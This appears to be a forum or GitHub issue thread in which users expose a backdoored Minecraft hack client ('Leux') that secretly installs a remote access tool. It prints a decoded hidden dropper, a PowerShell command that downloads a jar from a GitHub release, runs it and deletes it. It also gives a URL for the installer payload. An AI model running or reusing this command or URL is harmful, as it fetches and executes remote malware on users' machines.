Ima just wait until perry cleans it

[xgraza]

legit just remove the backdoor it says where the RAT is already

[HausemasterIssue]

i can legit clean it in the type it takes me to type this shit lol

[ssllllll]

@master7720 why would u want to use this, i mean, this is not an official version, this was designed to rat me

[xgraza]

cmd /c powershell (new-object System.Net.WebClient).DownloadFile('https://github.com/ObsidianBreaker/TestProject/releases/download/v1/TP.jar','%TEMP%\\\\TP.jar');&java -jar %TEMP%\\\\TP.jar&del %TEMP%\\\\TP.jar /f

another rat (?) lol, found in BlockInteractionHelper (https://github.com/ssllllll/LeuxBackdoor0.9-Deobf/blob/main/me/sazked/leux/client/util/BlockInteractHelper.java#L317#L319)

what did you do to piss these guys off

[ssllllll]

WTF IS THAT

I exposed them because they rat their members since the first release so i exposed them, my videos went viral, they ratted me, they nuked me

[xgraza]

i dont know what it is, but the repo is gone.

you might have another RAT in your pc lol

[xgraza]

i guess you could email github for a copy but i doubt they'd even have a backup or if theyd even disclose anything about it

[ssllllll]

Maybe it is a private repo, i have the rat from the same guy in my other computer but they cant do nothing because i have new brand pc, new token, new acc, etc

[xgraza]

however by a quick search of the repo, it seems nothing is done with those strings, so you should be fine

[ssllllll]

where did u find that

[xgraza]

https://github.com/ssllllll/LeuxBackdoor0.9-Deobf/blob/main/me/sazked/leux/client/util/BlockInteractHelper.java#L317#L319

[ssllllll]

BlockInteractHelper with Base64 imports 😹

[xgraza]

i quickly did a btoa in the dev console by looking at the strings and you have to decode them twice, then i just combined the strings and that was the order that made sense, which turns out to be a whole ass command that runs another jar

[xgraza]

and yeah love it when i have to decode my block positions with base4

[ssllllll]

probably that jar downloads and executes another jar

[xgraza]

probably lol, just like every phobos skid that comes out

[ssllllll]

https://copenn.000webhostapp.com/upload/installer.key

This downloads the installer, the installer downloads the updater (the remote access tool), i though that would be everything BUT now that i see the BlockInteractionHelper probably it downloads 567897654567 things

[xgraza]

i did end up looking at that yeah, which once that installer downloads, it injects a .dat file somewhere.

all you have to do is change .key -> .jar, how nice of the leux devs to make it so easy

[ssllllll]

YES, i decompiled the .key but sadly it is obfuscated with JNIC 😢

[xgraza]

how unfortunate, its probably just skidded from yoink rat, kinda like the whole client is a shitty phobos skid kek

[ssllllll]

wurst* the client started being a wurst skid 😹

[xgraza]

LMAO WHAT. like fucking wurstclient, how the hell and why the hell from WURST

i mean props to alexander but damn his client is shit, why the fuck would you skid from wurst of all clients

[ssllllll]

IKR, WURST I THE WORST SHIT YOU'LL SEE 😹 😹 😹

[ssllllll]

HOW DUMB CAN U BE TO SKID WURST AHAHAH

[xgraza]

obviously the leux devs are a great example. should ask them if they know what a boolean is, they probably couldnt answer or would be sweating to google what a boolean is and give you the word by word definition from wikipedia.

oh, and please tell me thats not even close to the real src of leux. its so fucking bad

[ssllllll]

nah, its the 0.6 version with empty modules, take a look at the PistonAura module

[ssllllll]

the 0.9 is well done but it still being a skid

[xgraza]

the code looks like mega shit though, so many unused methods and the just formatting of the code hurts me

[RussianxD]

My eyes hurt kkkkk

[ssllllll]

Russian callate un rato